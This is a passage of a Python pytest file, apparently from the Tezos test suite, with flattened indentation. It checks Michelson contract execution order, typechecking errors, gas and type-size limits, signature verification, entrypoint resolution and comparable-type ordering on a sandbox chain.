# tree of contracts. Leaf nodes map to Appender contracts calling
# the Storer. Inner nodes map to Caller contract that calling
# children.
#
# Example. Given the tree: ["A", ["B"], "C"], we obtain
# Caller([Appender("A"), Caller([Appender("B")]), Appender("C")])
# Before the protocol 009, contract execution order was in BFS
# In BFS, Storer would've ended up with storage ACB.
# In DFS, Storer will end up with storage ABC.
@pytest.mark.contract
@pytest.mark.incremental
class TestExecutionOrdering:
STORER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_storer.tz'
CALLER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_caller.tz'
APPENDER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_appender.tz'
def originate_storer(self, client: Client, session: dict):
origination = originate(
client, session, self.STORER, '""', 0, arguments=['--force']
)
session['storer'] = origination.contract
utils.bake(client, 'bootstrap3')
return origination.contract
def originate_appender(
self, client: Client, session: dict, storer: str, argument: str
):
origination = originate(
client,
session,
self.APPENDER,
f'Pair "{storer}" "{argument}"',
0,
contract_name=f'appender-{argument}',
arguments=['--force'],
)
session[f'appender.{argument}'] = origination.contract
utils.bake(client, 'bootstrap3')
return origination.contract
def originate_caller(
self, client: Client, session: dict, callees: List[str]
):
storage = "{" + '; '.join(map('"{}"'.format, callees)) + "}"
origination = originate(
client,
session,
self.CALLER,
storage,
0,
contract_name=f'caller-{hash(storage)}',
)
utils.bake(client, 'bootstrap3')
return origination.contract
@pytest.mark.parametrize(
"tree, expected",
[
# before 009, the result should be "DABCEFG".
([["A", "B", "C"], "D", ["E", "F", "G"]], "ABCDEFG"),
# before 009, the result should be "ACB".
([["A", ["B"], "C"]], "ABC"),
# before 009, the result should be "ABDC".
([["A", ["B", ["C"], "D"]]], "ABCD"),
([], ""),
],
)
def test_ordering(
self,
client: Client,
session: dict,
# approximation of recursive type annotation
tree: Union[str, List[Any]],
expected: str,
):
storer = self.originate_storer(client, session)
def deploy_tree(tree: Union[str, List[Any]]) -> str:
# leaf
if isinstance(tree, str):
# deploy and return caller str
return self.originate_appender(client, session, storer, tree)
# inner node
children = list(map(deploy_tree, tree))
return self.originate_caller(client, session, children)
root = deploy_tree(tree)
client.transfer(
0,
'bootstrap2',
root,
["--burn-cap", "5"],
)
utils.bake(client, 'bootstrap3')
assert client.get_storage(storer) == '"{}"'.format(expected)
@pytest.mark.slow
@pytest.mark.contract
class TestContracts:
"""Test type checking and execution of a bunch of contracts"""
@pytest.mark.parametrize("contract", all_contracts())
def test_typecheck(self, client: Client, contract):
assert contract.endswith(
'.tz'
), "test contract should have .tz extension"
client.typecheck(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.parametrize("contract", all_legacy_contracts())
def test_deprecated_typecheck_breaks(self, client, contract):
if contract in [
"legacy/create_contract.tz",
"legacy/create_contract_flags.tz",
"legacy/create_contract_rootname.tz",
]:
with utils.assert_run_failure(r'ill-typed script'):
client.typecheck(os.path.join(CONTRACT_PATH, contract))
else:
with utils.assert_run_failure(r'Use of deprecated instruction'):
client.typecheck(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.parametrize("contract", all_legacy_contracts())
def test_deprecated_typecheck_in_legacy(self, client, contract):
if contract in [
"legacy/create_contract.tz",
"legacy/create_contract_flags.tz",
"legacy/create_contract_rootname.tz",
]:
with utils.assert_run_failure(r'ill-typed script'):
client.typecheck(
os.path.join(CONTRACT_PATH, contract), legacy=True
)
else:
with utils.assert_run_failure(r'Use of deprecated instruction'):
client.typecheck(
os.path.join(CONTRACT_PATH, contract), legacy=True
)
@pytest.mark.parametrize(
"contract,error_pattern",
[
# operations cannot be PACKed
(
"pack_operation.tz",
r'operation type forbidden in parameter, storage and constants',
),
# big_maps cannot be PACKed
(
"pack_big_map.tz",
r'big_map or sapling_state type not expected here',
),
(
"invalid_self_entrypoint.tz",
r'Contract has no entrypoint named D',
),
("contract_annotation_default.tz", r'unexpected annotation'),
# Missing field
(
"missing_only_storage_field.tz",
r'Missing contract field: storage',
),
("missing_only_code_field.tz", r'Missing contract field: code'),
(
"missing_only_parameter_field.tz",
r'Missing contract field: parameter',
),
(
"missing_parameter_and_storage_fields.tz",
r'Missing contract field: parameter',
),
# Duplicated field
(
"multiple_parameter_field.tz",
r'duplicate contract field: parameter',
),
("multiple_code_field.tz", r'duplicate contract field: code'),
("multiple_storage_field.tz", r'duplicate contract field: storage'),
# The first duplicated field is reported, storage in this case
(
"multiple_storage_and_code_fields.tz",
r'duplicate contract field: storage',
),
# error message for set update on non-comparable type
(
"set_update_non_comparable.tz",
r'Type nat is not compatible with type list operation',
),
# error message for the arity of the chain_id type
(
"chain_id_arity.tz",
r'primitive chain_id expects 0 arguments but is given 1',
),
# error message for DIP over the limit
("big_dip.tz", r'expected a positive 10-bit integer'),
# error message for DROP over the limit
("big_drop.tz", r'expected a positive 10-bit integer'),
# error message for set update on non-comparable type
(
"set_update_non_comparable.tz",
r'Type nat is not compatible with type list operation',
),
# error message for attempting to push a value of type never
("never_literal.tz", r'type never has no inhabitant.'),
# field annotation mismatch with UNPAIR
(
"unpair_field_annotation_mismatch.tz",
r'The field access annotation does not match',
),
# COMB, UNCOMB, and DUP cannot take 0 as argument
("comb0.tz", r"PAIR expects an argument of at least 2"),
("comb1.tz", r"PAIR expects an argument of at least 2"),
("uncomb0.tz", r"UNPAIR expects an argument of at least 2"),
("uncomb1.tz", r"UNPAIR expects an argument of at least 2"),
("dup0.tz", r"DUP n expects an argument of at least 1"),
(
"push_big_map_with_id_with_parens.tz",
r"big_map or sapling_state type not expected here",
),
(
"push_big_map_with_id_without_parens.tz",
r"primitive PUSH expects 2 arguments but is given 4",
),
# sapling_state is not packable
(
"pack_sapling_state.tz",
r"big_map or sapling_state type not expected here",
),
# sapling_state is not packable
(
"unpack_sapling_state.tz",
r"big_map or sapling_state type not expected here",
),
# Ticket duplication attempt
("ticket_dup.tz", r'DUP used on the non-dupable type ticket nat'),
# error message for ticket unpack
("ticket_unpack.tz", r'Ticket in unauthorized position'),
# error message for attempting to use APPLY to capture a ticket
("ticket_apply.tz", r'Ticket in unauthorized position'),
# error message for attempting to wrap a ticket in a ticket
(
"ticket_in_ticket.tz",
r'comparable type expected.Type ticket unit is not comparable',
),
],
)
def test_ill_typecheck(self, client: Client, contract, error_pattern):
with utils.assert_run_failure(error_pattern):
client.typecheck(os.path.join(ILLTYPED_CONTRACT_PATH, contract))
def test_zero_transfer_to_implicit_contract(self, client):
pubkey = IDENTITIES['bootstrap3']['identity']
err = (
'Transaction of 0ꜩ towards a contract without code are '
rf'forbidden \({pubkey}\).'
)
with utils.assert_run_failure(err):
client.transfer(0, 'bootstrap2', 'bootstrap3', [])
def test_zero_transfer_to_nonexistent_contract(self, client):
nonexistent = "KT1Fcq4inD44aMhmUiTEHR1QMQwJT7p2u641"
err = rf'Contract {nonexistent} does not exist'
with utils.assert_run_failure(err):
client.transfer(0, 'bootstrap2', nonexistent, [])
FIRST_EXPLOSION = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
# FIRST_EXPLOSION costs a large amount of gas just for typechecking.
# FIRST_EXPLOSION_BIGTYPE type size exceeds the protocol set bound.
FIRST_EXPLOSION_BIGTYPE = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
SECOND_EXPLOSION = '''
{ parameter (list int) ;
storage (list (list (list int))) ;
code { CAR ; DIP { NIL (list int) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; DIP { NIL (list (list int)) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; NIL operation ; PAIR } }
'''
@pytest.mark.contract
class TestGasBound:
def test_write_contract(self, tmpdir, session: dict):
items = {
'first_explosion.tz': FIRST_EXPLOSION,
'first_explosion_bigtype.tz': FIRST_EXPLOSION_BIGTYPE,
'second_explosion.tz': SECOND_EXPLOSION,
}.items()
for name, script in items:
contract = f'{tmpdir}/{name}'
with open(contract, 'w') as contract_file:
contract_file.write(script)
session[name] = contract
def test_originate_first_explosion(self, client: Client, session: dict):
name = 'first_explosion.tz'
contract = session[name]
client.typecheck(contract)
args = ['-G', f'{1870}', '--burn-cap', '10']
expected_error = "Gas limit exceeded during typechecking or execution"
with utils.assert_run_failure(expected_error):
client.originate(f'{name}', 0, 'bootstrap1', contract, args)
def test_originate_big_type(self, client: Client, session: dict):
name = 'first_explosion_bigtype.tz'
contract = session[name]
# We could not be bothered with finding how to escape parentheses
# so we put dots
expected_error = "type size .1023. exceeded maximum type size .1000."
with utils.assert_run_failure(expected_error):
client.typecheck(contract)
def test_originate_second_explosion(self, client: Client, session: dict):
name = 'second_explosion.tz'
contract = session[name]
storage = '{}'
inp = '{1;2;3;4;5;6;7;8;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
client.run_script(contract, storage, inp)
def test_originate_second_explosion_fail(
self, client: Client, session: dict
):
name = 'second_explosion.tz'
contract = session[name]
storage = '{}'
inp = (
'{1;2;3;4;5;6;7;8;9;0;1;2;3;4;5;6;7;1;1;1;1;1;1;1;1;1;1;1'
+ ';1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
)
expected_error = (
"Cannot serialize the resulting storage"
+ " value within the provided gas bounds."
)
with utils.assert_run_failure(expected_error):
client.run_script(contract, storage, inp, gas=9290)
def test_typecheck_map_dup_key(self, client: Client):
expected_error = (
'Map literals cannot contain duplicate'
+ ' keys, however a duplicate key was found'
)
with utils.assert_run_failure(expected_error):
client.typecheck_data('{ Elt 0 1 ; Elt 0 1}', '(map nat nat)')
def test_typecheck_map_bad_ordering(self, client: Client):
expected_error = (
"Keys in a map literal must be in strictly"
+ " ascending order, but they were unordered in literal"
)
with utils.assert_run_failure(expected_error):
client.typecheck_data(
'{ Elt 0 1 ; Elt 10 1 ; Elt 5 1 }', '(map nat nat)'
)
def test_typecheck_set_bad_ordering(self, client: Client):
expected_error = (
"Values in a set literal must be in strictly"
+ " ascending order, but they were unordered in literal"
)
with utils.assert_run_failure(expected_error):
client.typecheck_data('{ "A" ; "C" ; "B" }', '(set string)')
def test_typecheck_set_no_duplicates(self, client: Client):
expected_error = (
"Set literals cannot contain duplicate values,"
+ " however a duplicate value was found"
)
with utils.assert_run_failure(expected_error):
client.typecheck_data('{ "A" ; "B" ; "B" }', '(set string)')
@pytest.mark.contract
class TestChainId:
def test_chain_id_opcode(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'opcodes', 'chain_id.tz')
originate(client, session, path, 'Unit', 0)
client.call('bootstrap2', "chain_id", [])
utils.bake(client, 'bootstrap5')
def test_chain_id_authentication_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'authentication.tz'
)
pubkey = IDENTITIES['bootstrap1']['public']
originate(client, session, path, f'Pair 0 "{pubkey}"', 1000)
utils.bake(client, 'bootstrap5')
def test_chain_id_authentication_first_run(
self, client: Client, session: dict
):
destination = IDENTITIES['bootstrap2']['identity']
operation = (
'{DROP; NIL operation; '
+ f'PUSH address "{destination}"; '
+ 'CONTRACT unit; ASSERT_SOME; PUSH mutez 1000; UNIT; '
+ 'TRANSFER_TOKENS; CONS}'
)
chain_id = client.rpc('get', 'chains/main/chain_id')
contract_address = session['contract']
packed = client.pack(
f'Pair (Pair "{chain_id}" "{contract_address}") '
+ f'(Pair {operation} 0)',
'pair (pair chain_id address)'
+ '(pair (lambda unit (list operation)) nat)',
)
signature = client.sign_bytes_of_string(packed, "bootstrap1")
client.call(
'bootstrap2',
'authentication',
['--arg', f'Pair {operation} \"{signature}\"'],
)
utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestBigMapToSelf:
def test_big_map_to_self_origination(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'opcodes', 'big_map_to_self.tz')
originate(client, session, path, '{}', 0)
utils.bake(client, 'bootstrap5')
def test_big_map_to_self_transfer(self, client: Client):
client.call('bootstrap2', "big_map_to_self", [])
utils.bake(client, 'bootstrap5')
client.transfer(0, 'bootstrap2', "big_map_to_self", [])
utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestNonRegression:
"""Test contract-related non-regressions"""
def test_issue_242_originate(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'non_regression', 'bug_262.tz')
originate(client, session, path, 'Unit', 1)
def test_issue_242_assert_balance(self, client: Client):
assert client.get_balance('bug_262') == 1
@pytest.mark.contract
class TestMiniScenarios:
"""Test mini scenarios"""
# replay.tz related tests
def test_replay_originate(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'mini_scenarios', 'replay.tz')
originate(client, session, path, 'Unit', 0)
def test_replay_transfer_fail(self, client: Client):
with utils.assert_run_failure("Internal operation replay attempt"):
client.transfer(10, "bootstrap1", "replay", [])
# create_contract.tz related tests
def test_create_contract_originate(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'create_contract.tz'
)
originate(client, session, path, 'Unit', 1000)
def test_create_contract_balance(self, client: Client):
assert client.get_balance('create_contract') == 1000
def test_create_contract_perform_creation(self, client: Client):
transfer_result = client.transfer(
0,
"bootstrap1",
"create_contract",
['-arg', 'None', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
pattern = r"New contract (\w*) originated"
match = re.search(pattern, transfer_result.client_output)
assert match is not None
kt_1 = match.groups()[0]
assert client.get_storage(kt_1) == '"abcdefg"'
assert client.get_balance(kt_1) == 100
assert client.get_balance('create_contract') == 900
# Originates a contract that when called, creates a contract with a
# rootname annotation. Such annotations comes in two flavors, thus the
# parameterization. Then calls the first contract and verifies the
# existence and type of the root entrypoint of the create contract.
@pytest.mark.parametrize(
"contract",
[
'create_contract_rootname.tz',
'create_contract_rootname_alt.tz',
],
)
def test_create_contract_rootname_originate(
self, client: Client, session: dict, contract
):
path = os.path.join(CONTRACT_PATH, 'opcodes', contract)
origination_res = originate(client, session, path, 'None', 1000)
transfer_result = client.transfer(
0,
"bootstrap1",
origination_res.contract,
['-arg', 'Unit', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
pattern = r"New contract (\w*) originated"
match = re.search(pattern, transfer_result.client_output)
assert match is not None
kt_1 = match.groups()[0]
entrypoint_type = client.get_contract_entrypoint_type(
'root', kt_1
).entrypoint_type
assert entrypoint_type == 'unit', (
'the entrypoint my_root of the originated contract should exist'
'with type unit'
)
# default_account.tz related tests
def test_default_account_originate(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'default_account.tz'
)
originate(client, session, path, 'Unit', 1000)
def test_default_account_transfer_then_bake(self, client: Client):
tz1 = IDENTITIES['bootstrap4']['identity']
client.transfer(
0,
"bootstrap1",
"default_account",
['-arg', f'"{tz1}"', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
account = 'tz1SuakBpFdG9b4twyfrSMqZzruxhpMeSrE5'
client.transfer(
0,
"bootstrap1",
"default_account",
['-arg', f'"{account}"', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
assert client.get_balance(account) == 100
# Test bytes, SHA252, CHECK_SIGNATURE
def test_reveal_signed_preimage_originate(
self, client: Client, session: dict
):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'reveal_signed_preimage.tz'
)
byt = (
'0x9995c2ef7bcc7ae3bd15bdd9b02'
+ 'dc6e877c27b26732340d641a4cbc6524813bb'
)
sign = 'p2pk66uq221795tFxT7jfNmXtBMdjMf6RAaxRTwv1dbuSHbH6yfqGwz'
storage = f'(Pair {byt} "{sign}")'
originate(client, session, path, storage, 1000)
def test_wrong_preimage(self, client: Client):
byt = (
'0x050100000027566f756c657a2d766f75732'
+ '0636f75636865722061766563206d6f692c20636520736f6972'
)
sign = (
'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJ'
+ 'VQ6LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
)
arg = f'(Pair {byt} "{sign}")'
# We check failure of ASSERT_CMPEQ in the script.
with utils.assert_run_failure("At line 8 characters 9 to 21"):
client.transfer(
0,
"bootstrap1",
"reveal_signed_preimage",
['-arg', arg, '--burn-cap', '10'],
)
def test_wrong_signature(self, client: Client):
byt = (
'0x050100000027566f756c657a2d766f757320636'
+ 'f75636865722061766563206d6f692c20636520736f6972203f'
)
sign = (
'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJVQ6'
+ 'LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
)
arg = f'(Pair {byt} "{sign}")'
# We check failure of CHECK_SIGNATURE ; ASSERT in the script.
with utils.assert_run_failure("At line 15 characters 9 to 15"):
client.transfer(
0,
"bootstrap1",
"reveal_signed_preimage",
['-arg', arg, '--burn-cap', '10'],
)
def test_good_preimage_and_signature(self, client: Client):
byt = (
'0x050100000027566f756c657a2d766f757320636f7563'
+ '6865722061766563206d6f692c20636520736f6972203f'
)
sign = (
'p2sigsceCzcDw2AeYDzUonj4JT341WC9Px4wdhHBxbZcG1F'
+ 'hfqFVuG7f2fGCzrEHSAZgrsrQWpxduDPk9qZRgrpzwJnSHC3gZJ'
)
arg = f'(Pair {byt} "{sign}")'
client.transfer(
0,
"bootstrap1",
"reveal_signed_preimage",
['-arg', arg, '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
# Test vote_for_delegate
def test_vote_for_delegate_originate(self, client: Client, session: dict):
b_3 = IDENTITIES['bootstrap3']['identity']
b_4 = IDENTITIES['bootstrap4']['identity']
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'vote_for_delegate.tz'
)
storage = f'''(Pair (Pair "{b_3}" None) (Pair "{b_4}" None))'''
originate(client, session, path, storage, 1000)
assert client.get_delegate('vote_for_delegate').delegate is None
def test_vote_for_delegate_wrong_identity1(self, client: Client):
# We check failure of CHECK_SIGNATURE ; ASSERT in the script.
with utils.assert_run_failure("At line 15 characters 57 to 61"):
client.transfer(
0,
"bootstrap1",
"vote_for_delegate",
['-arg', 'None', '--burn-cap', '10'],
)
def test_vote_for_delegate_wrong_identity2(self, client: Client):
# We check failure of CHECK_SIGNATURE ; ASSERT in the script.
with utils.assert_run_failure("At line 15 characters 57 to 61"):
client.transfer(
0,
"bootstrap2",
"vote_for_delegate",
['-arg', 'None', '--burn-cap', '10'],
)
def test_vote_for_delegate_b3_vote_for_b5(self, client: Client):
b_5 = IDENTITIES['bootstrap5']['identity']
client.transfer(
0,
"bootstrap3",
"vote_for_delegate",
['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
storage = client.get_storage('vote_for_delegate')
assert re.search(b_5, storage)
def test_vote_for_delegate_still_no_delegate1(self, client: Client):
assert client.get_delegate('vote_for_delegate').delegate is None
def test_vote_for_delegate_b4_vote_for_b2(self, client: Client):
b_2 = IDENTITIES['bootstrap2']['identity']
client.transfer(
0,
"bootstrap4",
"vote_for_delegate",
['-arg', f'(Some "{b_2}")', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
storage = client.get_storage('vote_for_delegate')
assert re.search(b_2, storage)
def test_vote_for_delegate_still_no_delegate2(self, client: Client):
assert client.get_delegate('vote_for_delegate').delegate is None
def test_vote_for_delegate_b4_vote_for_b5(self, client: Client):
b_5 = IDENTITIES['bootstrap5']['identity']
client.transfer(
0,
"bootstrap4",
"vote_for_delegate",
['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
storage = client.get_storage('vote_for_delegate')
assert re.search(b_5, storage)
def test_vote_for_delegate_has_delegate(self, client: Client):
b_5 = IDENTITIES['bootstrap5']['identity']
result = client.get_delegate('vote_for_delegate')
assert result.delegate == b_5
def test_multiple_entrypoints_counter(self, session: dict, client: Client):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'multiple_entrypoints_counter.tz'
)
storage = 'None'
# originate contract
originate(client, session, path, storage, 0)
utils.bake(client, 'bootstrap5')
# call contract: creates the internal contract and calls it.
client.transfer(
0,
'bootstrap1',
'multiple_entrypoints_counter',
['--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
assert client.get_storage('multiple_entrypoints_counter') == 'None', (
"The storage of the multiple_entrypoints_counter contract"
" should be None"
)
# Test CONTRACT with/without entrypoint annotation on literal address
# parameters with/without entrypoint annotation
def test_originate_simple_entrypoints(self, session: dict, client: Client):
"""originates the contract simple_entrypoints.tz
with entrypoint %A of type unit used in
test_simple_entrypoints"""
contract_target = os.path.join(
CONTRACT_PATH, 'entrypoints', 'simple_entrypoints.tz'
)
originate(client, session, contract_target, 'Unit', 0)
utils.bake(client, 'bootstrap5')
@pytest.mark.parametrize(
'contract_annotation, contract_type, param, expected_storage',
[
# tests passing adr to CONTRACT %A unit
# where adr has an entrypoint %A of type unit, is allowed.
('%A', 'unit', '"{adr}"', '(Some "{adr}%A")'),
('%B', 'string', '"{adr}"', '(Some "{adr}%B")'),
('%C', 'nat', '"{adr}"', '(Some "{adr}%C")'),
# tests passing adr%A to CONTRACT %A unit: redundant specification
# of entrypoint not allowed so CONTRACT returns None
('%A', 'unit', '"{adr}%A"', 'None'),
('%A', 'unit', '"{adr}%B"', 'None'),
('%A', 'unit', '"{adr}%D"', 'None'),
('%A', 'unit', '"{adr}%A"', 'None'),
('%B', 'unit', '"{adr}%A"', 'None'),
('%D', 'unit', '"{adr}%A"', 'None'),
# tests passing adr%A to CONTRACT unit:
# where adr has an entrypoint %A of type unit, is allowed.
('', 'unit', '"{adr}%A"', '(Some "{adr}%A")'),
('', 'string', '"{adr}%B"', '(Some "{adr}%B")'),
('', 'nat', '"{adr}%C"', '(Some "{adr}%C")'),
# tests passing adr%B to CONTRACT unit:
# as entrypoint %B of simple_entrypoints.tz has type string,
# CONTRACT will return None.
('', 'unit', '"{adr}%B"', 'None'),
# tests passing adr%D to CONTRACT unit:
# as entrypoint %D does not exist in simple_entrypoints.tz,
# CONTRACT will return None.
('', 'unit', '"{adr}%D"', 'None'),
# tests passing adr to CONTRACT unit:
# as adr does not have type unit, CONTRACT returns None.
('', 'unit', '"{adr}"', 'None'),
# entrypoint that does not exist
('%D', 'unit', '"{adr}"', 'None'),
# ill-typed entrypoints
('%A', 'int', '"{adr}"', 'None'),
('%B', 'unit', '"{adr}"', 'None'),
('%C', 'int', '"{adr}"', 'None'),
],
)
def test_simple_entrypoints(
self,
session,
client,
contract_annotation,
contract_type,
param,
expected_storage,
):
contract = f'''parameter address;
storage (option address);
code {{
CAR;
CONTRACT {contract_annotation} {contract_type};
IF_SOME {{ ADDRESS; SOME }} {{ NONE address; }};
NIL operation;
PAIR
}};'''
param = param.format(adr=session['contract'])
expected_storage = expected_storage.format(adr=session['contract'])
run_script_res = client.run_script(contract, 'None', param, file=False)
assert run_script_res.storage == expected_storage
@pytest.mark.contract
class TestComparables:
def test_comparable_unit(self, client):
client.typecheck_data('{}', '(set unit)')
client.typecheck_data('{Unit}', '(set unit)')
def test_comparable_options(self, client):
client.typecheck_data('{}', '(set (option nat))')
client.typecheck_data('{None; Some 1; Some 2}', '(set (option int))')
utils.assert_typecheck_data_failure(
client, '{Some "foo"; Some "bar"}', '(set (option string))'
)
utils.assert_typecheck_data_failure(
client, '{Some Unit; None}', '(set (option unit))'
)
def test_comparable_unions(self, client):
client.typecheck_data('{}', '(set (or unit bool))')
client.typecheck_data(
'{Left 3; Left 4; Right "bar"; Right "foo"}',
'(set (or nat string))',
)
utils.assert_typecheck_data_failure(
client, '{Left 2; Left 1}', '(set (or mutez unit))'
)
utils.assert_typecheck_data_failure(
client, '{Right True; Right False}', '(set (or unit bool))'
)
utils.assert_typecheck_data_failure(
client, '{Right 0; Left 1}', '(set (or nat nat))'
)
def test_comparable_pair(self, client: Client):
# tests that comb pairs are comparable and that the order is the
# expected one
client.typecheck_data('{}', '(set (pair nat string))')
client.typecheck_data('{Pair 0 "foo"}', '(set (pair nat string))')
client.typecheck_data(
'{Pair 0 "foo"; Pair 1 "bar"}', '(set (pair nat string))'
)
client.typecheck_data(
'{Pair 0 "bar"; Pair 0 "foo"; \
Pair 1 "bar"; Pair 1 "foo"}',
'(set (pair nat string))',
)
client.typecheck_data('{}', '(set (pair nat (pair string bytes)))')
client.typecheck_data('{}', '(map (pair nat string) unit)')
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit}', '(map (pair nat string) unit)'
)
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit}',
'(map (pair nat string) unit)',
)
client.typecheck_data(
'{Elt (Pair 0 "bar") Unit; \
Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit; \
Elt (Pair 1 "foo") Unit}',
'(map (pair nat string) unit)',
)
client.typecheck_data('{}', '(map (pair nat (pair string bytes)) unit)')
client.typecheck_data('{}', '(big_map (pair nat string) unit)')
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit}', '(big_map (pair nat string) unit)'
)
client.typecheck_data(
'{Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit}',
'(big_map (pair nat string) unit)',
)
client.typecheck_data(
'{Elt (Pair 0 "bar") Unit; \
Elt (Pair 0 "foo") Unit; \
Elt (Pair 1 "bar") Unit; \
Elt (Pair 1 "foo") Unit}',
'(big_map (pair nat string) unit)',
)
client.typecheck_data(
'{}', '(big_map (pair nat (pair string bytes)) unit)'
)
client.typecheck_data('{}', '(set (pair (pair nat nat) nat))')
client.typecheck_data(
'{}',
'(set (pair (pair int nat) \
(pair bool bytes)))',
)
def test_order_of_pairs(self, client: Client):
# tests that badly-ordered set literals are rejected
utils.assert_typecheck_data_failure(
client, '{Pair 0 "foo"; Pair 0 "bar"}', '(set (pair nat string))'
)
utils.assert_typecheck_data_failure(
client, '{Pair 1 "bar"; Pair 0 "foo"}', '(set (pair nat string))'
)
def test_comparable_chain_id(self, client):
client.typecheck_data('{}', '(set chain_id)')
chain1 = client.rpc('get', 'chains/main/chain_id')
chain2 = 'NetXZVhNXbDTx5M'
utils.assert_typecheck_data_failure(
client,
'{"' + f'{chain1}' + '"; "' + f'{chain2}' + '"}',
'(set chain_id)',
)
client.typecheck_data(
'{"' + f'{chain2}' + '"; "' + f'{chain1}' + '"}', '(set chain_id)'
)
def test_comparable_signature(self, client):
client.typecheck_data('{}', '(set signature)')
packed = client.pack('Unit', 'unit')
sig1 = client.sign_bytes_of_string(packed, "bootstrap1")
sig2 = client.sign_bytes_of_string(packed, "bootstrap2")
utils.assert_typecheck_data_failure(
client,
'{"' + f'{sig1}' + '"; "' + f'{sig2}' + '"}',
'(set signature)',
)
client.typecheck_data(
'{"' + f'{sig2}' + '"; "' + f'{sig1}' + '"}', '(set signature)'
)
def test_comparable_key(self, client):
pubkey1 = IDENTITIES['bootstrap1']['public']
pubkey2 = IDENTITIES['bootstrap2']['public']
client.typecheck_data('{}', '(set key)')
utils.assert_typecheck_data_failure(
client,
'{"' + f'{pubkey1}' + '"; "' + f'{pubkey2}' + '"}',
'(set key)',
)
client.typecheck_data(
'{"' + f'{pubkey2}' + '"; "' + f'{pubkey1}' + '"}', '(set key)'
)
def test_comparable_key_different_schemes(self, client):
client.gen_key('sk1', ['--sig', 'ed25519'])
key1 = client.show_address('sk1').public_key
client.gen_key('sk2', ['--sig', 'secp256k1'])
key2 = client.show_address('sk2').public_key
client.gen_key('sk3', ['--sig', 'p256'])
key3 = client.show_address('sk3').public_key
# Three public keys of the three different signature schemes, ordered
client.typecheck_data(
'{"' + key1 + '"; "' + key2 + '"; "' + key3 + '"}', '(set key)'
)
# Test all orderings that do not respect the comparable order
utils.assert_typecheck_data_failure(
client,
'{"' + key1 + '"; "' + key3 + '"; "' + key2 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key2 + '"; "' + key1 + '"; "' + key3 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key2 + '"; "' + key3 + '"; "' + key1 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key3 + '"; "' + key1 + '"; "' + key2 + '"}',
'(set key)',
)
utils.assert_typecheck_data_failure(
client,
'{"' + key3 + '"; "' + key2 + '"; "' + key1 + '"}',
'(set key)',
)
@pytest.mark.contract
class TestTypecheckingErrors:
def test_big_map_arity_error(self, client: Client):
error_pattern = (
'primitive EMPTY_BIG_MAP expects 2 arguments but is given 1.'
)
with utils.assert_run_failure(error_pattern):
client.typecheck(
os.path.join(CONTRACT_PATH, 'ill_typed', 'big_map_arity.tz')
)
BAD_ANNOT_TEST = '''
parameter bytes;
storage (option (lambda unit unit));
code { CAR; UNPACK (lambda unit unit); NIL operation; PAIR}
'''
@pytest.mark.contract
class TestBadAnnotation:
def test_write_contract_bad_annot(self, tmpdir, session: dict):
name = 'bad_annot.tz'
contract = f'{tmpdir}/{name}'
script = BAD_ANNOT_TEST
with open(contract, 'w') as contract_file:
contract_file.write(script)
session[name] = contract
def test_bad_annotation(self, client: Client, session: dict):
name = 'bad_annot.tz'
contract = session[name]
# This was produced by running "tezos-client hash data '{ UNIT
